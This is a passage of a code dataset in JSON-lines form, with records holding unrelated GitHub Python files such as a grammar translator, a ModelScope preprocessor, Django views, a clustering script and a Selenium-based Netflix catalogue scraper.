random.choice(self.Rules[output[index]])\n if replacement == self.EPS:\n replacement = ''\n output = output.replace(output[index], replacement, 1)\n print(' -->', output, end='')\n iterations += 1\n else:\n index += 1\n if (iterations > 30):\n print('\\nЧисло итераций превысило 30')\n else:\n print(f'\\nЧисло итераций {iterations}')\n return output\n\n def IsIn(self, word):\n family_tree = 
TreeNode.build_family_tree(TreeNode, word)\n # вывод дерева\n TreeNode.dfs(TreeNode, family_tree)\n paths = list(TreeNode.findS(TreeNode, family_tree))\n if len(paths) > 0:\n print(*paths, sep='\\n')\n print('Цепочка принадлежит грамматике')\n else:\n print(\"Цепочка не принадлежит грамматике\")\n\n\n\n\n def GetKeyByValue(value):\n for key in translator.Rules.keys():\n if value in translator.Rules[key]:\n return key\n else:\n raise ValueError('Нет такого значения')\n\n # Варианты на что можно свернуть нулевой, первый или первые 2 символа\n def GetListOfKeys(self, value):\n vars = []\n\n for key in translator.Rules.keys():\n if value != '':\n if value[0] in translator.Rules[key] or value[:2] in translator.Rules[key]:\n vars.append(key)\n if translator.EPS in translator.Rules[key] and value[0] in self.VN:\n vars.append(key)\n else:\n if translator.EPS in translator.Rules[key]:\n vars.append(key)\n return vars\n\n # свёртка по заданному варианту\n def fold(self, word, replace=None):\n result = ''\n if replace != None:\n begin = translator.Rules[replace]\n for val in begin:\n if word.startswith(val):\n result = replace + word[len(val):]\n break\n elif val == translator.EPS and word[0] in self.VN:\n result = replace + word\n break\n total = 0\n for term in self.VT:\n total += result.count(term)\n if total > 1:\n return word\n else:\n return result\n else:\n if word[:2] in translator.endings:\n word = translator.GetKeyByValue(word[:2]) + word[2:]\n else:\n word = translator.GetKeyByValue(word[0]) + word[1:]\n return word\n\n def DrawGraph(self):\n G = nx.DiGraph(directed=True)\n G.add_node('H')\n G.add_nodes_from(self.VT)\n\n labels_edges = {}\n # добавление ребер и меток к ним\n for term in self.Rules.keys():\n for value in self.Rules[term]:\n if len(value) == 1:\n # если конечный символ (a,b)\n if value in self.VN:\n edge = ('H', term)\n if labels_edges.get(edge) != None:\n labels_edges[edge] = labels_edges[edge] + ',' + value\n else:\n labels_edges[edge] = value\n G.add_edge('H', term)\n # если терминальный символ\n else:\n # метка для такого ребра не нужна\n G.add_edge(value, term)\n # G.add_edge(value, term)\n elif len(value) == 2:\n edge = (value[0], term)\n if labels_edges.get(edge) != None:\n labels_edges[edge] = labels_edges[edge] + ',' + value[1]\n else:\n labels_edges[edge] = value[1]\n G.add_edge(value[0], term)\n\n for edge in G.edges():\n if edge[0] == edge[1]:\n self.LoopGraph(self, G.edges(), labels_edges)\n return\n curved_edges = [edge for edge in G.edges() if edge[::-1] in G.edges() and edge[::-1] != edge]\n straight_edges = list(set(G.edges() - set(curved_edges)))\n circle_edges = [edge for edge in G.edges() if edge == edge[::-1]]\n\n pos = nx.spring_layout(G, seed=5)\n fig, ax = plt.subplots()\n\n nx.draw_networkx_nodes(G, pos, ax=ax)\n nx.draw_networkx_labels(G, pos, ax=ax)\n labels_curved = {edge: labels_edges[edge] for edge in labels_edges.keys() if edge in curved_edges}\n labels_straight = {edge: labels_edges[edge] for edge in labels_edges.keys() if edge in straight_edges}\n\n # прямые ребра\n nx.draw_networkx_edges(G, pos, ax=ax, edgelist=straight_edges)\n # загнутые ребра\n arc_rad = 0.25\n nx.draw_networkx_edges(G, pos, ax=ax, edgelist=curved_edges, connectionstyle=f'arc3, rad = {arc_rad}',\n arrows=True)\n\n # метки для загнутых ребер\n my_nx.my_draw_networkx_edge_labels(G, pos, ax=ax, edge_labels=labels_curved, rotate=False, rad=arc_rad)\n # метки для прямых ребер\n nx.draw_networkx_edge_labels(G, pos, ax=ax, edge_labels=labels_straight, rotate=False)\n\n 
plt.axis('off')\n plt.show()\n\n fig.savefig(\"диаграмма состояний.png\", bbox_inches='tight', pad_inches=0)\n\n def LoopGraph(self, edges, labels_edges):\n G = nx.MultiDiGraph()\n\n # add edges\n for edge in edges:\n if edge[0] == edge[1]:\n G.add_edge(edge[0], edge[1], color='red')\n else:\n G.add_edge(edge[0], edge[1])\n\n # print(G.edges(data=True))\n G.graph['edge'] = {'arrowsize': '0.6', 'splines': 'curved'}\n G.graph['graph'] = {'scale': '3'}\n\n A = to_agraph(G)\n\n A.graph_attr['strict'] = True\n A.graph_attr['rankdir'] = 'LR'\n A.layout('dot')\n\n # set edge labels\n for pair in labels_edges:\n edge = A.get_edge(pair[0], pair[1])\n edge.attr['label'] = str(labels_edges[pair]) + \" \"\n\n A.draw('диаграмма состояний (петля).png')\n\n\nclass TreeNode:\n IsIn = False\n def __init__(self, data):\n self.data = data\n self.children = []\n\n def build_family_tree(self, data):\n root = TreeNode(data)\n vars = translator.GetListOfKeys(translator, data)\n if vars is None:\n return\n for var in vars:\n newword = translator.fold(translator, data, var)\n if newword == 'S':\n self.IsIn = True\n child = self.build_family_tree(self, newword)\n root.children.append(child)\n # self.build_family_tree(newword)\n\n return root\n\n def dfs(self, node, level=0):\n indent = \" \" * level * 4\n print(indent + str(node.data))\n for child in node.children:\n self.dfs(self, child, level + 1)\n\n def findS(self, node):\n if node.children != []:\n for child in node.children:\n yield from ([node.data] + arr for arr in self.findS(self, child))\n #если лист дерева\n else:\n if node.data == 'S':\n yield [node.data]\n","repo_name":"doresolla/Translation-Methods","sub_path":"tr.py","file_name":"tr.py","file_ext":"py","file_size_in_byte":9559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12612753743","text":"#Time complexity: O(n^2):\r\n\r\ndef firstnonrepeating(s):\r\n\tfor i in range(len(s)):\r\n\t\tduplicate_seen = False\r\n\t\tfor j in range(len(s)):\r\n\t\t\tif s[i] == s[j] and i != j:\r\n\t\t\t\tduplicate_seen = True\r\n\t\t\t\tbreak\r\n\t\tif not duplicate_seen:\r\n\t\t\treturn s[i]\r\n\treturn '_'\r\n\r\n#print(firstnonrepeating(input(\"Enter string: \")))\r\n\r\n#Time complexity: O(2n) or O(n)\r\n\r\ndef firstnonrepeating_simp(s):\r\n\tfreq = {}\r\n\tfor i in range(len(s)):\r\n\t\tif s[i] in freq:\r\n\t\t\tfreq[s[i]] += 1\r\n\t\telse:\r\n\t\t\tfreq[s[i]] = 1\r\n\r\n\tfor i in range(len(s)):\r\n\t\tif freq[s[i]] == 1:\r\n\t\t\treturn s[i]\r\n\r\n\treturn '_'\r\n\r\nprint(firstnonrepeating_simp(input(\"Enter string: \")))\r\n","repo_name":"aashishah/DSA_Practice","sub_path":"Strings/FirstNonRepeatingChar.py","file_name":"FirstNonRepeatingChar.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22864149968","text":"from typing import Any, Dict\n\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom modelscope.preprocessors.image import load_image\nfrom modelscope.utils.constant import ModeKeys\nfrom .base import OfaBasePreprocessor\n\n\nclass OfaVisualEntailmentPreprocessor(OfaBasePreprocessor):\n r\"\"\"\n OFA preprocessor for visual entailment tasks.\n \"\"\"\n\n def __init__(self,\n cfg,\n model_dir,\n mode=ModeKeys.INFERENCE,\n *args,\n **kwargs):\n \"\"\"preprocess the data\n\n Args:\n cfg(modelscope.utils.config.ConfigDict) : model config\n model_dir (str): model path,\n mode: preprocessor mode (model mode)\n 
\"\"\"\n super(OfaVisualEntailmentPreprocessor,\n self).__init__(cfg, model_dir, mode, *args, **kwargs)\n # Initialize transform\n self.patch_resize_transform = transforms.Compose([\n lambda image: image.convert('RGB'),\n transforms.Resize(\n (self.patch_image_size, self.patch_image_size),\n interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean=self.mean, std=self.std),\n ])\n\n def __call__(self, data: Dict[str, Any]) -> Dict[str, Any]:\n if self.mode == ModeKeys.TRAIN:\n return self._build_train_sample(data)\n else:\n return self._build_infer_sample(data)\n\n def _build_train_sample(self, data: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\"\n Building training samples.\n\n step 1. Preprocess the data using the logic of `_build_infer_sample`\n and make sure the label data in the result.\n step 2. Preprocess the label data to generate the `target` and\n `prev_output_tokens`.\n - tokenize the label data.\n - calculate the target item.\n 1) if `promp_type` is `None`, using tokenized label data.\n 2) if `promp_type` is `src`, concatenating the `source` data\n and tokenized label data.\n 3) if `promp_type` is `prev_output`, concatenating the `source`\n data without eos token and tokenized label data\n step 3. Add constraint mask\n\n Args:\n data (`Dict[str, Any]`): Input data, should contains the key of `text`\n `text2` and `label` are optional.\n Return:\n A dict object, contains source text input, patch images, patch masks\n with `Tensor([True])` value, decoder prompt, label, target, previous\n output tokens and constraint mask.\n \"\"\"\n sample = self._build_infer_sample(data)\n target = ' {}'.format(sample['label'])\n sample['ref_dict'] = {sample['label']: 1.0}\n tgt_item = self.tokenize_text(target, add_bos=False, add_eos=False)\n\n if self.prompt_type == 'none':\n prev_output_item = torch.cat([self.bos_item, tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n elif self.prompt_type == 'src':\n prev_output_item = torch.cat([sample['source'], tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n elif self.prompt_type == 'prev_output':\n prev_output_item = torch.cat([sample['source'][:-1], tgt_item])\n target_item = torch.cat([prev_output_item[1:], self.eos_item])\n else:\n raise NotImplementedError\n\n target_item[:-len(tgt_item) - 1] = self.tokenizer.pad_token_id\n sample['target'] = target_item\n sample['prev_output_tokens'] = prev_output_item\n\n if self.constraint_trie is not None:\n constraint_mask = torch.zeros(\n (len(target_item), len(self.tgt_dict))).bool()\n start_idx = len(target_item) - len(tgt_item) - 1\n for i in range(\n len(target_item) - len(tgt_item) - 1, len(target_item)):\n constraint_prefix_token = [\n self.tgt_dict.bos()\n ] + target_item[start_idx:i].tolist()\n constraint_nodes = self.constraint_trie.get_next_layer(\n constraint_prefix_token)\n constraint_mask[i][constraint_nodes] = True\n sample['constraint_mask'] = constraint_mask\n\n return sample\n\n def _build_infer_sample(self, data: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\"\n Building inference samples.\n\n step 1. Preprocessing the image as model's image input.\n - get the pillow image input from `data`\n - do some transforms to the pillow image, such as resize, normalize etc.\n step 2. Building the instruction as model's source text input.\n - use text input to build instruction. 
so far, we support two kind of\n input form, we will take different examples to both of them to explain\n how to use them.\n 1) only `text` input in data. this setting can solve the tasks which\n judge whether or not the input `text` describe the input image.\n 2) both `text` and `text2` input in data. this setting can solve the\n tasks which judge whether or not the `text` together with input image\n can imply the `text2`\n - tokenize the instruction above.\n step 3. Calculate the decoder prompt input.\n step 4. Whether or not to add label data.\n\n Args:\n data (`Dict[str, Any]`): Input data, should contains the key of `text`\n `text2` and `label` are optional.\n Return:\n A dict object, contains source text input, patch images, patch masks\n with `Tensor([True])` value, decoder prompt and label.\n \"\"\"\n image = self.get_img_pil(data[self.column_map['image']])\n patch_image = self.patch_resize_transform(image)\n if 'text2' not in data:\n hypothesis = self.pre_caption(data[self.column_map['text']],\n self.max_src_length)\n prompt = self.cfg.model.get('prompt',\n ' does the image describe \" {} \"?')\n text = prompt.format(hypothesis)\n else:\n assert 'text' in data, f'text must be in the input {data.keys()}'\n caption = self.pre_caption(data[self.column_map['text2']],\n self.max_src_length)\n hypothesis = self.pre_caption(data[self.column_map['text']],\n self.max_src_length)\n prompt = self.cfg.model.get(\n 'prompt', ' can image and text1 \" {} \" imply text2 \" {} \"?')\n text = prompt.format(caption, hypothesis)\n inputs = self.tokenize_text(text)\n if self.prompt_type == 'none':\n prefix_token = []\n decoder_prompt = self.bos_item\n elif self.prompt_type == 'prev_output':\n prefix_token = inputs[:-1] # remove eos\n decoder_prompt = inputs[:-1]\n else:\n raise NotImplementedError\n sample = {\n 'source': inputs,\n 'patch_image': patch_image,\n 'patch_mask': torch.tensor([True]),\n 'prefix_token': prefix_token,\n 'decoder_prompt': decoder_prompt,\n }\n if 'relation' in self.column_map and self.column_map[\n 'relation'] in data:\n sample['label'] = data[self.column_map['relation']]\n return sample\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/preprocessors/ofa/visual_entailment.py","file_name":"visual_entailment.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"30471865583","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\nfrom about.models import Data\n\ndef index(request):\n return render(request, \"index.html\")\n\ndef photo(request):\n data = Data.objects.all()\n context = {\n \"datas\": data\n }\n print(data)\n return render(request, \"photo.html\", context=context)\n\ndef about(request):\n with open('about/about.txt') as file:\n file2 = file.readlines()\n context = {\n \"about\": file2\n }\n return render(request, \"about.html\", context=context)\n\ndef contacts(request):\n with open('about/contacts.txt') as file:\n file2 = file.readlines()\n context = {\n \"contacts\": file2\n }\n return render(request, \"contacts.html\", context=context)","repo_name":"Nurzhigit2109/Django_task1","sub_path":"task/about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26425500332","text":"import os\n\n# 현재 파이썬 스크립트의 위치를 가져옵니다.\nscript_dir = 
os.path.dirname(os.path.abspath(__file__))\n\n# 파일 경로를 지정합니다.\ninput_base_path = os.path.join(script_dir, r\"../src/dts_original/\")\noutput_base_path = os.path.join(script_dir, r\"../src/dts_processed/\")\n\ndef list_local_files(directory_path) :\n # 디렉토리 내의 파일들을 리스트로 반환합니다.\n return [os.path.join(directory_path, file_name) for file_name in os.listdir(directory_path)]\n\nlocal_original_files = list_local_files(input_base_path)\n\nfor dts_file in local_original_files:\n file_name = os.path.basename(dts_file)\n file_name_without_ext = os.path.splitext(file_name)[0]\n input_file_path = input_base_path + file_name\n output_file_path = output_base_path + file_name_without_ext + \"_output.txt\"\n\n # 입력 파일을 open, readlines로 읽어옵니다.\n with open(input_file_path, \"r\", encoding=\"utf-8\") as infile:\n lines = infile.readlines()\n # print(lines)\n\n # 출력 파일에 `{` 다음에 줄바꿈이 오는 줄들 ('{\\n'으로 끝나는 줄)만을 이어붙입니다.\n with open(output_file_path, \"w\", encoding=\"utf-8\") as outfile:\n for line in lines:\n if (line.strip().endswith(\"{\") | line.strip().endswith(\"}\")):\n # print(line)\n outfile.write(line)\n\n print(f\"[-] Work Done! Checkout {output_file_path} file.\")\n ","repo_name":"reteu5/starlink_bobdoduk","sub_path":"code/parse_from_dts_simplified.py","file_name":"parse_from_dts_simplified.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6233811481","text":"import numpy as np\n\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nfrom typing import List\n\nfrom scripts.data_processing.clustering_model import ClusteringModel\nfrom scripts.data_processing.model_repo import ModelRepo\nfrom spherecluster import SphericalKMeans\n\nfrom scripts.data_processing.model_folder import ModelFolder\nfrom scripts.data_processing.data_loading import save_clustering_model\n\n\ndef __run_clustering(vectors: np.ndarray, models_folder: Path, n_clusters: int, n_init: int, max_iter: int, init: str,\n n_jobs: int, random_state: int) -> SphericalKMeans:\n print(f'thread = {n_jobs}')\n kmeans = SphericalKMeans(n_clusters=n_clusters, n_init=n_init, max_iter=max_iter, n_jobs=n_jobs,\n verbose=1, random_state=random_state, init=init)\n kmeans.fit(vectors)\n save_clustering_model(models_folder / f'repo-kmeans-{n_clusters}', kmeans)\n\n\ndef run_clustering(\n model_folder: ModelFolder, clustering_model_name: str, data_folder: Path, ns_clusters: List[int], n_init: int,\n max_iter: int, init: str = 'random', n_jobs: int = -1, random_state: int = 42\n) -> List[SphericalKMeans]:\n\n clustering_model = ClusteringModel(model_folder.clustering_models_folder / clustering_model_name, model_folder)\n model_repo = ModelRepo(data_folder)\n vectors = model_repo.repos_cluster_embeddings(model_folder, clustering_model)\n models = []\n for n_clusters in ns_clusters:\n models.append(__run_clustering(\n vectors, model_folder.clustering_models_folder, n_clusters, n_init, max_iter, init, n_jobs, random_state\n ))\n return models\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--folder', help='Folder with model information', required=True, type=str)\n parser.add_argument('--clustering_model', help='Name of clustering model', required=True, type=str)\n parser.add_argument('--data_folder', help='Folder with dataset info', required=True, type=str)\n parser.add_argument('--n_clusters', help='Number of clusters', required=True, type=int, nargs='+')\n parser.add_argument('--n_init', help='Number of 
initializations to try', default=10, type=int)\n parser.add_argument('--max_iter', help='Maximum number of iterations', default=300, type=int)\n parser.add_argument('--init', help='Type of initialization (k-means++ or random)', default='random', type=str)\n parser.add_argument('--n_jobs', help='Number of processes to use when optimizing', default=-1, type=int)\n parser.add_argument('--random_state', help='Random state', default=42, type=int)\n args = parser.parse_args()\n\n run_clustering(ModelFolder(Path(args.folder), Path(args.data_folder)), args.clustering_model,\n Path(args.data_folder), args.n_clusters,\n args.n_init, args.max_iter, args.init, args.n_jobs, args.random_state)\n","repo_name":"egor-bogomolov/topic-modeling","sub_path":"scripts/clustering/run_repos_clustering.py","file_name":"run_repos_clustering.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12039974633","text":"import argparse\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nparser = argparse.ArgumentParser(description='Automatically commit file changes.')\nparser.add_argument(\"-p\", \"--path\", help=\"Enter folder path.\")\n#parser.add_argument(\"-u\")\nargs = parser.parse_args()\n\npath = args.path\n\n\nclass CommitHandler(FileSystemEventHandler):\n def process(self, event):\n print(event.event_type, event.src_path)\n\n def on_any_event(self, event):\n self.process(event)\n\n\nif __name__ == '__main__':\n observer = Observer()\n observer.schedule(CommitHandler(), path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"sharadbhat/Python-Scripts","sub_path":"Auto Commit/auto_commit.py","file_name":"auto_commit.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42248857648","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import CategoriesList, ProductViewSet, ReviewViewSet, WishViewSet\n\nproduct_router = DefaultRouter()\nproduct_router.register('', ProductViewSet)\n\nreview_router = DefaultRouter()\nreview_router.register('', ReviewViewSet)\n\nwish_router = DefaultRouter()\nwish_router.register('', WishViewSet)\n\nurlpatterns = [\n path('categories/', CategoriesList.as_view()),\n path('', include(product_router.urls)),\n path('<str:short_title>/reviews/', include(review_router.urls)),\n path('<str:username>/wishlist/', include(wish_router.urls))\n]","repo_name":"Ataix/MyShop","sub_path":"myshop/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36844155282","text":"import unittest\n\nfrom zope.interface.verify import verifyClass\nimport zope.interface\nfrom six import class_types\nfrom slapos import slap\n\ndef getOnlyImplementationAssertionMethod(klass, method_list):\n \"\"\"Returns method which verifies if a klass only implements its interfaces\"\"\"\n def testMethod(self):\n implemented_method_list = {x for x in dir(klass)\n if not x.startswith('_') and callable(getattr(klass, x))}\n implemented_method_list.difference_update(method_list)\n\n if implemented_method_list:\n raise AssertionError(\"Unexpected methods %s\" % 
implemented_method_list)\n return testMethod\n\ndef getImplementationAssertionMethod(klass, interface):\n \"\"\"Returns method which verifies if interface is properly implemented by klass\"\"\"\n def testMethod(self):\n verifyClass(interface, klass)\n return testMethod\n\ndef getDeclarationAssertionMethod(klass):\n \"\"\"Returns method which verifies if klass is declaring interface\"\"\"\n def testMethod(self):\n if len(list(zope.interface.implementedBy(klass))) == 0:\n self.fail('%s class does not respect its interface(s).' % klass.__name__)\n return testMethod\n\ndef generateTestMethodListOnClass(klass, module):\n \"\"\"Generate test method on klass\"\"\"\n for class_id in dir(module):\n implementing_class = getattr(module, class_id)\n if not isinstance(implementing_class, class_types):\n continue\n # add methods to assert that publicly available classes are defining\n # interfaces\n method_name = 'test_%s_declares_interface' % (class_id,)\n setattr(klass, method_name, getDeclarationAssertionMethod(\n implementing_class))\n\n implemented_method_list = ['with_traceback']\n for interface in list(zope.interface.implementedBy(implementing_class)):\n # for each interface which class declares add a method which verify\n # implementation\n method_name = 'test_%s_implements_%s' % (class_id,\n interface.__identifier__)\n setattr(klass, method_name, getImplementationAssertionMethod(\n implementing_class, interface))\n\n for interface_klass in interface.__iro__:\n implemented_method_list.extend(interface_klass.names())\n\n # for each interface which class declares, check that no other method are\n # available\n method_name = 'test_%s_only_implements' % class_id\n setattr(klass, method_name, getOnlyImplementationAssertionMethod(\n implementing_class,\n implemented_method_list))\n\nclass TestInterface(unittest.TestCase):\n \"\"\"Tests all publicly available classes of slap\n\n Classes are checked *if* they implement interface and if the implementation\n is correct.\n \"\"\"\n\n# add methods to test class\ngenerateTestMethodListOnClass(TestInterface, slap)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SlapOS/slapos.core","sub_path":"slapos/tests/test_interface.py","file_name":"test_interface.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"15312394701","text":"from urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup\nfrom selenium import webdriver\nimport time\nimport codecs\nimport csv\nimport json\nimport io\nimport os\nimport unicodedata\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#Main function\n\ndef main():\n\n\tnetflixURL = []\n\tnetflixURLTV = []\n\tgenreList = []\n\tfileName = []\n\n\t#Open Chrome driver\n\toptions = webdriver.ChromeOptions()\n\toptions.add_argument('headless')\n\toptions.add_argument('window-size=2000x3000')\n\tdriver = webdriver.Chrome(chrome_options=options)\n\n\t# Opens list of URLs\n\topenURL(netflixURL, netflixURLTV, genreList, fileName)\n\n\turl = 'https://www.netflix.com/au/login'\n\tUSERNAME = ''\n\tPASSWORD = ''\n\t\n\tdriver.get(url)\n\t# wait up to 10 seconds for the elements to become available\n\tdriver.implicitly_wait(5)\n\t\n\t# use css selectors to grab the login inputs\n\temail = driver.find_element_by_css_selector('input[name=email]')\n\tpassword = 
driver.find_element_by_css_selector('input[name=password]')\n\tlogin = driver.find_element_by_css_selector('button[type=\"submit\"]')\n\n\temail.send_keys(USERNAME)\n\tpassword.send_keys(PASSWORD)\n\n\tlogin.click()\n\n\tdriver.get('https://www.netflix.com/SwitchProfile?tkn=A523JK2EC5ANTLAYQ7ALJN77TQ')\n\n\t# Parsing content for each genre\n\tnetflix(netflixURL, genreList, fileName, driver)\n\n\tnetflixTV(netflixURLTV, genreList, fileName, driver)\n\n\tdriver.quit()\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#open list of URLs\n\ndef openURL(netflixURL, netflixURLTV, genreList, fileName):\n\n\twith open('movieList.csv') as movieList:\n\t\treader = csv.reader(movieList)\n\t\tfor row in reader:\n\t\t\tnetflixURL.append(row[0])\n\t\t\tnetflixURLTV.append(row[6])\n\t\t\tgenreList.append(row[4])\n\t\t\tfileName.append(row[5])\n\tprint('Loaded URLs')\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Netflix\n\ndef netflix(netflixURL, websiteGenre, fileName, driver):\n\n\t# local variables\n\tnetflix = 'https://netflix.com/au'\n\tmovieList = []\n\tlogo = '/images/logos/netflix.png'\n\n\tfor i in range(1, len(netflixURL)):\n\t\tprint(websiteGenre[i] + '------------------')\n\t\tdriver.get(netflixURL[i])\n\t\tdriver.implicitly_wait(5)\n\t\tscroll(driver)\n\t\t#driver.get_screenshot_as_file('./netflix/' + fileName[i] + '.png')\n\n\t\thtml = driver.page_source\n\t\tpage_soup = soup(html, \"html.parser\")\n\t\tcontainers = page_soup.findAll(\"div\", {\"class\":\"title-card-container\"})\n\n\t\tfor container in containers:\n\t\t\turl = container.div.div.a[\"href\"]\n\t\t\tfor x in range(1, len(url)):\n\t\t\t\tif url[x] == '/':\n\t\t\t\t\ty = [x, 0]\n\t\t\t\tif url[x] == '?':\n\t\t\t\t\ty[1] = x\n\t\t\tids = url[y[0]+1:y[1]]\n\t\t\tdata = {}\n\t\t\tdata['name'] = container.div.div.a[\"aria-label\"]\n\t\t\tdata['name'] = unicodedata.normalize('NFKD', data['name']).encode('ASCII', 'ignore').decode(\"ascii\")\n\t\t\tdata['name'] = data['name'].replace(' III', ' 3')\n\t\t\tdata['name'] = data['name'].replace(' II', ' 2')\n\t\t\tdata['name'] = data['name'].replace(' IV', ' 4')\n\t\t\tdata['id'] = int(ids)\n\t\t\tdata['type'] = 'movie'\n\t\t\tdata['url'] = netflix + url\n\t\t\tdata['genre'] = [{'title': websiteGenre[i]}]\n\t\t\tdata['poster_path'] = ''\n\t\t\tdata['banner_art'] = ''\n\t\t\tdata['stream'] = 'netflix'\n\t\t\tdata['logo'] = logo\n\t\t\tdata['classification'] = []\n\t\t\tdata['runtime'] = 0\n\t\t\tdata['release_date'] = ''\n\t\t\tdata['overview'] = ''\n\n\t\t\tmovieList.append(data)\n\n\t\tif os.path.isfile('./netflix/movies/' + fileName[i] + '.json'):\n\t\t\tos.remove('./netflix/movies/' + fileName[i] + '.json')\n\n\t\tfor j in range(0, len(movieList)):\n\t\t\twriteToJSONFile('./netflix/movies/' + fileName[i], movieList[j], 'a')\n\t\t\n\t\tmovieList = []\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Netflix TV\n\ndef netflixTV(netflixURLTV, websiteGenre, fileName, driver):\n\n\t# local variables\n\tnetflix = 'https://netflix.com/au'\n\ttvList = []\n\tlogo = '/images/logos/netflix.png'\n\n\tfor i in range(1, len(netflixURLTV)):\n\t\tif not netflixURLTV[i] == '':\n\t\t\tprint(websiteGenre[i] + 
'---------tv---------')\n\t\t\tdriver.get(netflixURLTV[i])\n\t\t\tdriver.implicitly_wait(5)\n\t\t\tscroll(driver)\n\t\t\t#driver.get_screenshot_as_file('./netflix/' + fileName[i] + '.png')\n\t\t\t\n\t\t\thtml = driver.page_source\n\t\t\tpage_soup = soup(html, \"html.parser\")\n\t\t\tcontainers = page_soup.findAll(\"div\", {\"class\":\"title-card-container\"})\n\t\t\t\n\t\t\tfor container in containers:\n\t\t\t\turl = container.div.div.a[\"href\"]\n\t\t\t\tfor x in range(1, len(url)):\n\t\t\t\t\tif url[x] == '/':\n\t\t\t\t\t\ty = [x, 0]\n\t\t\t\t\tif url[x] == '?':\n\t\t\t\t\t\ty[1] = x\n\t\t\t\tids = url[y[0]+1:y[1]]\n\t\t\t\tdata = {}\n\t\t\t\tdata['name'] = container.div.div.a[\"aria-label\"]\n\t\t\t\tdata['name'] = unicodedata.normalize('NFKD', data['name']).encode('ASCII', 'ignore').decode(\"ascii\")\n\t\t\t\tdata['name'] = data['name'].replace(' III', ' 3')\n\t\t\t\tdata['name'] = data['name'].replace(' II', ' 2')\n\t\t\t\tdata['name'] = data['name'].replace(' IV', ' 4')\n\t\t\t\tdata['type'] = 'tv'\n\t\t\t\tdata['id'] = int(ids)\n\t\t\t\tdata['url'] = netflix + url\n\t\t\t\tdata['genre'] = [{'title': websiteGenre[i]}]\n\t\t\t\tdata['poster_path'] = ''\n\t\t\t\tdata['banner_art'] = ''\n\t\t\t\tdata['stream'] = 'netflix'\n\t\t\t\tdata['logo'] = logo\n\t\t\t\tdata['classification'] = []\n\t\t\t\tdata['runtime'] = 0\n\t\t\t\tdata['release_date'] = ''\n\t\t\t\tdata['overview'] = ''\n\t\t\t\t\n\t\t\t\ttvList.append(data)\n\t\n\t\t\tif os.path.isfile('./netflix/tv/' + fileName[i] + '.json'):\n\t\t\t\tos.remove('./netflix/tv/' + fileName[i] + '.json')\n\t\n\t\t\tfor j in range(0, len(tvList)):\n\t\t\t\twriteToJSONFile('./netflix/tv/' + fileName[i], tvList[j], 'a')\n\t\t\t\n\t\t\ttvList = []\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n# Write data to json file\n\ndef writeToJSONFile(fileName, data, writeStatus):\n\n\tfilePathNameWExt = fileName + '.json'\n\twith io.open(filePathNameWExt, writeStatus, encoding=\"utf-8\") as f:\n\t\tjson.dump(data, f, ensure_ascii=False)\n\t\tf.write('\\n')\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n#Web Scroll function\n\ndef scroll(driver):\n\tSCROLL_PAUSE_TIME = 3\n\n\t# Get scroll height\n\tlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n\twhile True:\n\t\t# Scroll down to bottom\n\t\tdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\n\t\t# Wait to load page\n\t\ttime.sleep(SCROLL_PAUSE_TIME)\n\t\t\n\t\t# Calculate new scroll height and compare with last scroll height\n\t\tnew_height = driver.execute_script(\"return document.body.scrollHeight\")\n\t\tif new_height == last_height:\n\t\t\tbreak\n\t\tlast_height = new_height\n\n#-------------------------------------------------------------------------------------------------------------------------------------------------\n\nmain()","repo_name":"Grove3/DataMining","sub_path":"netflix.py","file_name":"netflix.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3243946322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\nfrom twidibot.logger import log\nfrom twidibot.helpers import gpDump, gpLoad, round_float_to_int\n\n\nclass StorageController(object):\n \"\"\"Generic controller that takes care of all strorage 
